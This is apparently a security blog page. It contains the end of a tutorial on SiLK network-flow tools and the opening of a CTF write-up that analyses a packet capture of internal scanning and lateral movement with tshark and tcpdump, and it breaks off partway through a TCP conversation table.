<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;"> 8.8.8.8| 172.28.10.137|</span>
<span style="color: white;">...</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Split a flow file into multiple files with <b><i>rwsplit</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwsplit --basename=nik_split_ --compression=best --flow-limit=4 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--max-outputs=2 --note-add="Files created with rwsplit" attack-trace.rw</b></span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Validate the <b><i>rwsplit</i></b> files were created.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">ls nik_split_.0000000*</span></b></span>
<span style="color: white;">nik_split_.00000000.rwf nik_split_.00000001.rwf</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use <b><i>rwfileinfo </i></b>to get information on one of the <b><i>rwsplit </i></b>created files.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfileinfo nik_split_.00000001.rwf</span></b></span>
<span style="color: white;">nik_split_.00000001.rwf:</span>
<span style="color: white;"> format(id) FT_RWIPV6ROUTING(0x0c)</span>
<span style="color: white;"> version 16</span>
<span style="color: white;"> byte-order littleEndian</span>
<span style="color: white;"> compression(id) zlib(1)</span>
<span style="color: white;"> header-length 264</span>
<span style="color: white;"> record-length 88</span>
<span style="color: white;"> record-version 1</span>
<span style="color: white;"> silk-version 3.19.2</span>
<span style="color: white;"> count-records 4</span>
<span style="color: white;"> file-size 404</span>
<span style="color: white;"> command-lines</span>
<span style="color: white;"> 1 rwsplit --basename=nik_split_ --compression=best --flow-limit=4 --max-outputs=2 --note-add=Files created with rwsplit attack-trace.rw</span>
<span style="color: white;"> annotations</span>
<span style="color: white;"> 1 Files created with rwsplit</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><div>Changing the byte order of the file with <b><i>rwswapbytes</i></b>.</div><div><br /></div><div>Get the current byte order of the file<i> 8.rw</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfileinfo 8.rw --fields=byte-order</span></b></span>
<span style="color: white;">8.rw:</span>
<span style="color: white;"> byte-order littleEndian</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Change the byte order using <b><i>rwswapbytes</i></b></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwswapbytes --big-endian \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>--note-add="Byte order swapped from little endian" 8.rw 8-swappped.rwf</span>
</span></b></pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Validate the byte order has been changed.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfileinfo 8-swappped.rwf --fields=byte-order</span></b></span>
<span style="color: white;">8-swappped.rwf:</span>
<span style="color: white;"> byte-order BigEndian</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Get some totals with <b><i>rwtotal</i></b>. Looking at the first 8 bytes of the destination IPs.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwtotal attack-trace.rw --summation --skip-zero --dip-first-8</span></b></span>
<span style="color: white;"> dIP_First8| Records| Bytes| Packets|</span>
<span style="color: white;"> 98| 6| 7297| 153|</span>
<span style="color: white;"> 192| 6| 171264| 195|</span>
<span style="color: white;"> TOTALS| 12| 178561| 348|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Instead look at the first 24 bytes of the source IP.</div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwtotal attack-trace.rw --summation --skip-zero --sip-first-24</span></b></span>
<span style="color: white;">sIP_First24| Records| Bytes| Packets|</span>
<span style="color: white;"> 98.114.205| 6| 171264| 195|</span>
<span style="color: white;">192.150. 11| 6| 7297| 153|</span>
<span style="color: white;"> TOTALS| 12| 178561| 348|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use <b><i>rwtotal </i></b>to learn what are the protocols seen on the network?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwtotal attack-trace.rw --proto --summation --skip-zero</span></b></span>
<span style="color: white;"> protocol| Records| Bytes| Packets|</span>
<span style="color: white;"> 6| 12| 178561| 348|</span>
<span style="color: white;"> TOTALS| 12| 178561| 348|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Looking at the destination ports</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwtotal attack-trace.rw --dport --summation --skip-zero --print-filenames</span></b></span>
<span style="color: white;">attack-trace.rw</span>
<span style="color: white;"> dPort| Records| Bytes| Packets|</span>
<span style="color: white;"> 445| 2| 4945| 18|</span>
<span style="color: white;"> 1080| 1| 165088| 159|</span>
<span style="color: white;"> 1821| 1| 128| 3|</span>
<span style="color: white;"> 1828| 1| 1590| 17|</span>
<span style="color: white;"> 1924| 1| 250| 6|</span>
<span style="color: white;"> 1957| 1| 381| 6|</span>
<span style="color: white;"> 2152| 1| 4488| 112|</span>
<span style="color: white;"> 8884| 2| 841| 15|</span>
<span style="color: white;"> 36296| 2| 850| 12|</span>
<span style="color: white;"> TOTALS| 12| 178561| 348|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><br /></div><div><div>Reference:</div><div><a href="https://tools.netsa.cert.org/silk/analysis-handbook.pdf">https://tools.netsa.cert.org/silk/analysis-handbook.pdf</a></div><div><a href="https://resources.sei.cmu.edu/asset_files/Presentation/2014_017_001_90110.pdf">https://resources.sei.cmu.edu/asset_files/Presentation/2014_017_001_90110.pdf</a></div><div><a href="https://www.ibm.com/docs/en/qsip/7.4?topic=applications-icmp-type-code-ids">https://www.ibm.com/docs/en/qsip/7.4?topic=applications-icmp-type-code-ids</a></div><div><a href="https://apps.dtic.mil/sti/pdfs/AD1084382.pdf">https://apps.dtic.mil/sti/pdfs/AD1084382.pdf</a></div><div><a href="https://tools.netsa.cert.org/silk/silk-reference-guide.pdf">https://tools.netsa.cert.org/silk/silk-reference-guide.pdf</a></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com1tag:blogger.com,1999:blog-7303400454979750101.post-41224861664726663162023-09-01T20:57:00.001-07:002023-09-02T05:29:33.135-07:00Solving the CTF challenge - Network Forensics (packet and log analysis), USB Disk Forensics, Database Forensics, Stego<p>At work, we develop and run various Cyber Security challenges to help the Analyst (and the rest of the team) to rapidly build and demonstrate their skillset. This challenge was put together by one of our Managers <a href="https://www.linkedin.com/in/jeanmarranzini" target="_blank">Jean</a>. I thought this was an interesting challenge that covered a number of areas. As a result, I thought I should take a stab at it. Here is my write up of my analysis.</p><p><span style="font-size: large;">Summary<br /></span>On July 23, 2023 at 23:13 a report was made of suspicious activity relating to someone scanning the 10.240.240.0/24 subnet. Upon investigation, it was determined that these scans originated from the device at IP 10.240.240.5. This device is currently used by the user Newman. The scan successfully identified services for SMB, MSSQL and others. While not found via the scan, the user using Newman account was able to login to the PC at 10.240.240.4 on port 5985 which is associated with Powershell Remoting. There were also connections made from 10.240.240.4 to 10.240.240.6 on port 1433 which is associated with MSQL.</p><p>Further analysis of this activity, determined that a malicious file pretending to be Windows update, was executed on the system, resulting in a number of processes being spawned. Most of these activities were performed by the user account Jerry who is the authenticated user on Jerry-PC. </p><p>The image below shows a synopsis of the activity.</p><p><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPi8khr9oXDo9jj3_9yril2oJOoHZy8s3R-UBfQUa0v-6w_cdSHSM8HFCVYoySa5WAdjvjuIFx2N55wAvnpafmJitO0KJ42XYeZK6J1JCqHbtvlSqkMluFxZPjcV9dAYxzQr25vk9j6lqhUz3mU-MHoGvq4NNnwR-OsgNBKk1e4cxkzglOs02RsYJTbLQ/s1422/Nik%20Process%20Diagram.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1422" data-original-width="1220" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPi8khr9oXDo9jj3_9yril2oJOoHZy8s3R-UBfQUa0v-6w_cdSHSM8HFCVYoySa5WAdjvjuIFx2N55wAvnpafmJitO0KJ42XYeZK6J1JCqHbtvlSqkMluFxZPjcV9dAYxzQr25vk9j6lqhUz3mU-MHoGvq4NNnwR-OsgNBKk1e4cxkzglOs02RsYJTbLQ/w549-h640/Nik%20Process%20Diagram.gif" width="549" /></a></div><br /><br /><p></p><p><span style="font-size: large;">Detailed Analysis</span></p><p>First start by looking at the evidence file provided.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ md5sum challenge_data.zip </span>
<span style="color: white;">6f620299c237236c068ef3000d086833 challenge_data.zip</span>
</pre></div>
</div><div><br /></div><div><div>Extract the files .</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ unzip challenge_data.zip -d jean_challenge/</span>
<span style="color: white;">Archive: challenge_data.zip</span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-4-events.csv </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-4-events.evtx </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-4-events.txt </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-4-events.xml </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-5-events.csv </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-5-events.evtx </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-5-events.txt </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-5-events.xml </span>
<span style="color: white;"> inflating: jean_challenge/packet_capture/packet_capture.pcap </span>
<span style="color: white;"> inflating: jean_challenge/packet_capture/packet_capture.pcapng </span>
<span style="color: white;"> inflating: jean_challenge/sql_logs/sql_logs.csv </span>
<span style="color: white;"> inflating: jean_challenge/sql_logs/sql_logs.xel </span>
<span style="color: white;"> inflating: jean_challenge/usbstick_image/usbstick.vhd </span>
</pre></div>
</div><div><br /></div><div><div>Starting with my strengths, performing network forensics on <i>packet_capture.pcapng</i> using <a href="https://www.amazon.com/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024" target="_blank">Tshark</a>. Looking at the protocol hierarchy to see what is in the PCAP.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r packet_capture.pcapng -z io,phs</span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:4926 bytes:1917097</span>
<span style="color: white;"> arp frames:718 bytes:40020</span>
<span style="color: white;"> ip frames:4208 bytes:1877077</span>
<span style="color: white;"> udp frames:26 bytes:5222</span>
<span style="color: white;"> nbdgm frames:8 bytes:1944</span>
<span style="color: white;"> smb frames:8 bytes:1944</span>
<span style="color: white;"> mailslot frames:8 bytes:1944</span>
<span style="color: white;"> browser frames:8 bytes:1944</span>
<span style="color: white;"> nbns frames:4 bytes:582</span>
<span style="color: white;"> data frames:6 bytes:2052</span>
<span style="color: white;"> mdns frames:8 bytes:644</span>
<span style="color: white;"> tcp frames:4146 bytes:1864247</span>
<span style="color: white;"> data frames:72 bytes:4536</span>
<span style="color: white;"> nbss frames:728 bytes:126126</span>
<span style="color: white;"> smb frames:4 bytes:888</span>
<span style="color: white;"> smb2 frames:710 bytes:123980</span>
<span style="color: white;"> data frames:117 bytes:20181</span>
<span style="color: white;"> tds frames:144 bytes:48140</span>
<span style="color: white;"> tcp.segments frames:3 bytes:3716</span>
<span style="color: white;"> _ws.malformed frames:3 bytes:857</span>
<span style="color: white;"> dcerpc frames:18 bytes:5028</span>
<span style="color: white;"> oxid frames:4 bytes:552</span>
<span style="color: white;"> isystemactivator frames:2 bytes:1900</span>
<span style="color: white;"> tls frames:91 bytes:34985</span>
<span style="color: white;"> http frames:569 bytes:372420</span>
<span style="color: white;"> xml frames:569 bytes:372420</span>
<span style="color: white;"> tcp.segments frames:382 bytes:159294</span>
<span style="color: white;"> icmp frames:36 bytes:7608</span>
<span style="color: white;"> data frames:6 bytes:2220</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Identifying the number of unique sessions in the files.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r packet_capture.pcapng -T fields -e tcp.stream | sort | uniq --count | sort --numeric-sort --reverse | wc --lines </span>
<span style="color: white;">300</span>
</pre></div>
</div><div><br /></div><div><div>With 300 unique sessions where to start?! Looking at the unique IPs in the file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r packet_capture.pcapng -z conv,ip | sed '1,5d;$d' | cut --fields 1 --delimiter ' ' | sort --uniq</span>
<span style="color: white;">10.240.240.4</span>
<span style="color: white;">10.240.240.5</span>
<span style="color: white;">10.240.240.6</span>
</pre></div>
</div><div><br /></div><div><div>Looking at how these IPs were communicating</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r packet_capture.pcapng -z conv,ip</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">IPv4 Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.240.240.5 <-> 10.240.240.4 1381 653 kB 1795 1,071 kB 3176 1,725 kB 9.965524000 625.0360</span>
<span style="color: white;">10.240.240.4 <-> 10.240.240.6 240 43 kB 294 68 kB 534 112 kB 123.097336000 526.4997</span>
<span style="color: white;">10.240.240.5 <-> 10.240.240.6 211 15 kB 271 21 kB 482 36 kB 9.965348000 22.3932</span>
<span style="color: white;">10.240.240.4 <-> 224.0.0.251 0 0 bytes 4 296 bytes 4 296 bytes 149.549610000 0.6121</span>
<span style="color: white;">10.240.240.6 <-> 224.0.0.251 0 0 bytes 4 348 bytes 4 348 bytes 149.552598000 0.6092</span>
<span style="color: white;">10.240.240.4 <-> 10.240.240.255 0 0 bytes 3 729 bytes 3 729 bytes 9.784243000 359.6082</span>
<span style="color: white;">10.240.240.5 <-> 10.240.240.255 0 0 bytes 3 729 bytes 3 729 bytes 15.335371000 360.2213</span>
<span style="color: white;">10.240.240.6 <-> 10.240.240.255 0 0 bytes 2 486 bytes 2 486 bytes 120.685407000 479.2508</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div><div>From above, we can see the first 3 sessions have the most frames while the last 5 has 0. </div><div><br /></div><div>Looking at the first IP conversation it has a time of 625 seconds. The second has 526 seconds and the 3rd 22 seconds.</div><div><br /></div><div>Taking a look at the communication between the first two hosts. If you are wondering why the switch to <i>tcpdump</i>, just an accident. Nothing specific.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tcpdump -n -r packet_capture.pcapng 'host 10.240.240.5 and 10.240.240.4' -w 5-4.pcap</span>
</pre></div>
</div><div><br /></div><div><div>How many sessions do we have now, that have occurred between these two hosts?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r 5-4.pcap -T fields -e tcp.stream | sort | uniq --count | sort --numeric-sort --reverse | wc --lines</span>
<span style="color: white;">129</span>
</pre></div>
</div><div><br /></div><div><div>Ok, with 129 sessions, where do I start?! Asking this question again, from the conversations perspective.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r 5-4.pcap -z conv,tcp</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.240.240.4:49674 <-> 10.240.240.5:445 360 63 kB 466 67 kB 826 130 kB 76.244037000 542.9534</span>
<span style="color: white;">10.240.240.5:49704 <-> 10.240.240.4:5985 378 338 kB 390 221 kB 768 559 kB 182.473326000 429.0919</span>
<span style="color: white;">10.240.240.5:49706 <-> 10.240.240.4:5985 216 128 kB 479 418 kB 695 547 kB 182.937975000 444.0836</span>
<span style="color: white;">10.240.240.5:49705 <-> 10.240.240.4:5985 182 110 kB 402 356 kB 584 467 kB 182.860278000 428.7639</span>
<span style="color: white;">10.240.240.5:49682 <-> 10.240.240.4:135 4 264 bytes 5 468 bytes 9 732 bytes 9.194943000 0.0060</span>
<span style="color: white;">10.240.240.5:49675 <-> 10.240.240.4:135 3 186 bytes 5 332 bytes 8 518 bytes 3.175866000 6.0191</span>
<span style="color: white;">10.240.240.5:49676 <-> 10.240.240.4:139 3 186 bytes 5 318 bytes 8 504 bytes 3.176094000 6.0231</span>
<span style="color: white;">10.240.240.5:49686 <-> 10.240.240.4:139 3 186 bytes 5 468 bytes 8 654 bytes 9.198805000 0.0040</span>
<span style="color: white;">10.240.240.5:49677 <-> 10.240.240.4:445 2 126 bytes 3 348 bytes 5 474 bytes 3.176193000 6.0172</span>
<span style="color: white;">10.240.240.5:49683 <-> 10.240.240.4:445 2 126 bytes 3 186 bytes 5 312 bytes 9.196929000 0.0032</span>
<span style="color: white;">10.240.240.5:49689 <-> 10.240.240.4:445 2 126 bytes 3 198 bytes 5 324 bytes 9.201052000 0.0020</span>
<span style="color: white;">10.240.240.5:49691 <-> 10.240.240.4:445 2 126 bytes 3 268 bytes 5 394 bytes 9.203503000 0.0006</span>
<span style="color: white;">10.240.240.5:49693 <-> 10.240.240.4:445 2 126 bytes 3 290 bytes 5 416 bytes 9.204569000 0.0006</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:135 1 60 bytes 2 120 bytes 3 180 bytes 1.986875000 0.0003</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:139 1 60 bytes 2 120 bytes 3 180 bytes 1.987486000 0.0004</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:445 1 60 bytes 2 120 bytes 3 180 bytes 1.989021000 0.0002</span>
<span style="color: white;">10.240.240.5:63115 <-> 10.240.240.4:135 1 74 bytes 2 134 bytes 3 208 bytes 14.311654000 0.0004</span>
<span style="color: white;">10.240.240.5:63116 <-> 10.240.240.4:135 1 74 bytes 2 134 bytes 3 208 bytes 14.413983000 0.0003</span>
<span style="color: white;">10.240.240.5:63117 <-> 10.240.240.4:135 1 74 bytes 2 134 bytes 3 208 bytes 14.521630000 0.0005</span>
<span style="color: white;">10.240.240.5:63118 <-> 10.240.240.4:135 1 74 bytes 2 130 bytes 3 204 bytes 14.627085000 0.0004</span>
<span style="color: white;">10.240.240.5:63119 <-> 10.240.240.4:135 1 74 bytes 2 134 bytes 3 208 bytes 14.733035000 0.0006</span>
<span style="color: white;">10.240.240.5:63120 <-> 10.240.240.4:135 1 70 bytes 2 130 bytes 3 200 bytes 14.839555000 0.0006</span>
<span style="color: white;">10.240.240.5:63127 <-> 10.240.240.4:135 1 66 bytes 2 126 bytes 3 192 bytes 14.983360000 0.0004</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:25 1 60 bytes 1 60 bytes 2 120 bytes 1.985584000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:143 1 60 bytes 1 60 bytes 2 120 bytes 1.985873000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:80 1 60 bytes 1 60 bytes 2 120 bytes 1.986099000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:554 1 60 bytes 1 60 bytes 2 120 bytes 1.986254000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:111 1 60 bytes 1 60 bytes 2 120 bytes 1.987703000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5900 1 60 bytes 1 60 bytes 2 120 bytes 1.988023000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8888 1 60 bytes 1 60 bytes 2 120 bytes 1.988265000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1720 1 60 bytes 1 60 bytes 2 120 bytes 1.988459000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1723 1 60 bytes 1 60 bytes 2 120 bytes 1.988511000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1025 1 60 bytes 1 60 bytes 2 120 bytes 1.988725000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:21 1 60 bytes 1 60 bytes 2 120 bytes 1.988861000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:199 1 60 bytes 1 60 bytes 2 120 bytes 1.989295000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8080 1 60 bytes 1 60 bytes 2 120 bytes 1.989493000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3389 1 60 bytes 1 60 bytes 2 120 bytes 1.989684000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:995 1 60 bytes 1 60 bytes 2 120 bytes 1.989834000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:23 1 60 bytes 1 60 bytes 2 120 bytes 1.989958000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:110 1 60 bytes 1 60 bytes 2 120 bytes 1.990236000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3306 1 60 bytes 1 60 bytes 2 120 bytes 1.990361000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:53 1 60 bytes 1 60 bytes 2 120 bytes 1.990590000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:587 1 60 bytes 1 60 bytes 2 120 bytes 1.990756000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:22 1 60 bytes 1 60 bytes 2 120 bytes 1.990917000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:993 1 60 bytes 1 60 bytes 2 120 bytes 1.991138000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:113 1 60 bytes 1 60 bytes 2 120 bytes 1.991356000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:443 1 60 bytes 1 60 bytes 2 120 bytes 1.991532000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:4899 1 60 bytes 1 60 bytes 2 120 bytes 1.991827000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1110 1 60 bytes 1 60 bytes 2 120 bytes 1.991970000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:179 1 60 bytes 1 60 bytes 2 120 bytes 1.992097000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:37 1 60 bytes 1 60 bytes 2 120 bytes 1.992311000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2049 1 60 bytes 1 60 bytes 2 120 bytes 1.992457000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:88 1 60 bytes 1 60 bytes 2 120 bytes 1.992611000 0.0001</span>
